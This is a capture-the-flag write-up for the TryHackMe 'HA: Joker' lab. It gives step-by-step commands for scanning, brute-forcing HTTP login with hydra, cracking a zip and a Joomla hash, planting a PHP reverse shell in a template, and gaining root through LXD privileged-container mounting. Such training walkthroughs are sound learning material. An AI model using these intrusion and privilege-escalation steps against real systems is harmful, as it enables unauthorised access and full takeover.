Published in · 8 min read · Feb 3, 2023
--
Batman hits Joker.
Today, we will tackle a Boot to Root challenge named “HA: Joker” This challenge has been created for online penetration testing practices and is not too difficult if you have a basic understanding of penetration testing. We will learn how to breach the system through this challenge. This write-up is for another TryHackMe CTF and has a dark knight (Batman) and Joker theme. This challenge introduces a new technique for privilege escalation using LXD. If you are unfamiliar with LXD, please check out the linked article for more information. In short, LXD is similar to a virtual machine but uses LXC. Let’s start the machine and dive into the challenge.
This is a straightforward CTF training room that provides an opportunity to practice various skills. You will be able to practice enumeration, hash cracking, brute-forcing, exploitation, and privilege escalation. Have a great time and enjoy the challenge!
To access material, start machines and answer questions you need to join this room!
nmap -sV -sC -A -T4 10.10.83.156By using this nmap command, we are able to perform an aggressive scan (-A option) with a timing template (-T4 option) on our target with the IP address of 10.10.83.156. This scan will help us gather information about open ports and services running on the target machine. With the gathered information, we can proceed to the next step in our penetration testing process.
Our nmap scan revealed that there are three open ports on the target machine, with Port 22 (SSH), Port 80 (HTTP), and Port 8080 (HTTP). Since we have no information about the SSH port, we will move on and not focus on it for now. Our next step will be to explore the open HTTP ports (Port 80 and Port 8080) for any potential vulnerabilities.
According to the Nmap results, we can see that the target machine is using Apache 2.4.29. However, there is not much information we can gather from this, so we will move on to the next step in our penetration testing process.
We have discovered a file with a Joker’s face and confirmed that Port 80 can be accessed without a username or password. With this information, we can move on to our next step of enumerating the site for any hidden files using gobuster. This will provide us with further information and potential vulnerabilities to exploit.
gobuster dir -u <Machine IP> -w /usr/share/dirb/wordlists/common.txt -x txt,php,html,zipWe have found a hidden file named secret.txt through our enumeration process. It is now time to examine the contents of this file to gather additional information and progress in our penetration testing.
Unfortunately, the site requires login credentials. Based on the theme, we guess that the username might be “Joker.” With the guessed username in hand, we can now proceed to brute-force the password to gain access to the site.
hydra -l joker -P /usr/share/wordlists/rockyou.txt 'machine-ip' -s 8080 http-get -t 64Do not forget the port 8080! There might be something interesting inside it
We have successfully obtained the login credentials for the site. The site appears to be a CMS-based blog. Our next step is to search for directories and files within this port. We should look for a directory that may potentially be the admin directory, as it may contain sensitive information.
We have gained access to the site and based on the favicon, we have determined that the site is using Joomla CMS. Our next step is to perform a Nikto web enumeration to gather more information about the site and potential vulnerabilities. This will provide us with a deeper understanding of the site and allow us to proceed with our penetration testing.
nikto -h http://10.10.83.156:8080/ -id joker:PASSWORDOur Nikto web enumeration has revealed that the website contains a robots.txt file and that the /administrator/ directory redirects us to the admin login site. This information will be useful as we continue our penetration testing and attempt to gain access to sensitive information within the site.
During the Nikto web enumeration process, we came across a /backup.zip file. Although we don’t have the login credentials yet, this zip file may potentially contain useful information or lead us closer to finding the username and password. It is worth investigating further.
Unfortunately, the zip file is password protected. To attempt to access the contents of the file, we can use the zip2john tool to convert the zip file into a hash and then use John the Ripper to crack the hash. This process may reveal the password for the zip file, allowing us to access its contents.
The password for the zip file turned out to be the same as the one we obtained from the brute-force attack. After extracting the contents of the zip file, we discovered two folders. One of these folders, the “db” folder, caught our attention. Upon further examination, we found that the Joomla super-user username and hashed password were stored in an SQL file within this folder.
With our newly acquired SuperUser credentials, we have access to the Joomla server. To exploit this access, we will use a PHP reverse shell, which can be found in Kali Linux. We will begin by navigating to the Template section within the Joomla CMS. To do this, we will first click on the Extensions option in the menu, and then select the beez3 template. From here, we will choose the Customise option to open an edit section. In this section, we will select the index.php file and replace its contents with our PHP reverse shell code. It is important to remember to change the IP address and/or port number to match your specific setup.
After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below
After we got the shell, we saw that the shell that we got is an improper shell, so we used the python one-liner to convert it into a proper shell. After conversion, we ran the id command. We saw that this shell is of the user ‘www-data’. We saw that this user is a part of the lxd group. This could be our way to root
To learn the Lxd privilege escalation in detail, refer to this article: “Lxd Privilege Escalation”.
In order to take escalate the root privilege of the target machine, we will have to create an image for lxd. To that, we will first, Download build-alpine in the attacker machine (Kali Linux) through the git repository. After that, we will be traversing it into the lxd-alpine-builder directory and execute the script “build -alpine” that will build the latest Alpine image as a compressed file.
Reference : Read documentation about LXC / LXD
git clone https://github.com/saghul/lxd-alpine-builder.git
sudo ./build-alpinegit clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpineWith this I got a “.tar.gz” file. Now I have to upload it to the victim machine. First the Python server:
python3 -m http.serverThen on the victim machine I went to the “/tmp” directory and loaded the file:
xc image import ./'my-alpine-filename'.tar.gz --alias myimage
lxc image listlxc init myimage pwn -c security.privileged=true
lxc config device add pwn mydevice disk source=/ path=/mnt/root recursive=true
lxc start pwn
lxc exec pwn /bin/sh
idAnd I got root! Now that this container got mounted I went to the “/mnt” directory. The final file was located at “/mnt/root/root”.
I got the name of the file and the content is:
Congratulations! You successfully completed a challenging lab that involved a variety of skills and techniques. Well done!
Now we have all our ingredients let’s submit it and we have successfully completed our CTF !!
Keep Trying, Keep Working :)
Thank you for Reading!!
Happy Hacking
Follow me more to get more tips and tricks! 🙏
